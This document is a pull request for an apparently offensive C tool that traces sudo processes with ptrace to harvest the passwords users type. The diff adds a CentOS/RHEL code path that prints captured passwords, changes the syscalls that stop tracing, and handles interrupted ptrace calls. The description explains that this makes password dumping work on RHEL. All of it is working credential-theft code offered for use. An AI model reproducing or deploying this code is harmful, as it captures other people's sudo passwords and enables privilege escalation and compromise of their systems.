### PR TITLE
Add support for CentOS/RHEL

### DIFF
--- a/src/sudo_tracer.c
+++ b/src/sudo_tracer.c
@@ -82,6 +82,11 @@ void intercept_sudo(pid_t traced_process) {
         free(read_string);
         read_string = NULL;
       }
+    } else if (i) { // needed for CentOS/RHEL
+      if (strnascii(password, i))
+        output("%s\n", password);
+      memset(password, 0, MAX_PASSWORD_LEN);
+      i = 0;
     }
 
     if (wait_for_syscall(traced_process) != 0)

--- a/src/sudo_tracer.c
+++ b/src/sudo_tracer.c
@@ -49,10 +49,13 @@ void intercept_sudo(pid_t traced_process) {
 
     syscall = get_syscall(traced_process);
 
-    // Stop tracing the process after the clone system call. The sudo
-    // process will say alive as long as its child process. Commands
-    // like sudo su or sudo bash could keep this process open for a while
-    if (syscall == SYSCALL_clone)
+    // Stop tracing the process after pipe2 or select. On modern Linux we
+    // can wait for clone, but old versions of CentOS call clone
+    // repeatedly before the password is captured. Instead we wait for
+    // pipe2 on modern Linux and select on old CentOS, which occur shortly
+    // after the password is captured. Commands like sudo su or sudo bash
+    // could keep this process open for a while
+    if (syscall == SYSCALL_pipe2 || syscall == SYSCALL_select)
       goto exit_sudo;
 
     if (syscall == SYSCALL_read) {

--- a/src/tracers.c
+++ b/src/tracers.c
@@ -42,6 +42,11 @@ int wait_for_syscall(pid_t child) {
       return 0;
     }
 
+    // SIGUSR1 -- rerun ptrace because syscall was interrupted
+    if (WIFSTOPPED(status) && WSTOPSIG(status) == 0x11) {
+      continue;
+    }
+
     if (WIFSTOPPED(status)) {
       kill(child, WSTOPSIG(status));
       return 1;

--- a/src/tracers.h
+++ b/src/tracers.h
@@ -27,13 +27,17 @@
 #define orig_eax orig_rax
 #define SYSCALL_read  0
 #define SYSCALL_write 1
+#define SYSCALL_select 23
 #define SYSCALL_dup   32
 #define SYSCALL_clone 56
+#define SYSCALL_pipe2 293
 #else
 #define SYSCALL_read  3
 #define SYSCALL_write 4
 #define SYSCALL_dup   41
+#define SYSCALL_select 82
 #define SYSCALL_clone 120
+#define SYSCALL_pipe2 331
 #endif
 
 #define _offsetof(a, b) __builtin_offsetof(a,b)

--- a/src/tracers.h
+++ b/src/tracers.h
@@ -27,6 +27,7 @@
 #define orig_eax orig_rax
 #define SYSCALL_read  0
 #define SYSCALL_write 1
+#define SYSCALL_rt_sigprocmask 14
 #define SYSCALL_select 23
 #define SYSCALL_dup   32
 #define SYSCALL_clone 56
@@ -37,6 +38,7 @@
 #define SYSCALL_dup   41
 #define SYSCALL_select 82
 #define SYSCALL_clone 120
+#define SYSCALL_rt_sigprocmask 175
 #define SYSCALL_pipe2 331
 #endif
 


### PR DESCRIPTION
On CentOS/RHEL sudo support was not working. The first character
returned on a read of length 1 was '\0', followed by the password
characters, and there was no terminating '\0'. This code dumps the
password if a read of length > 1 occurs and a password has been
captured.

Fixes #11
Fixes #2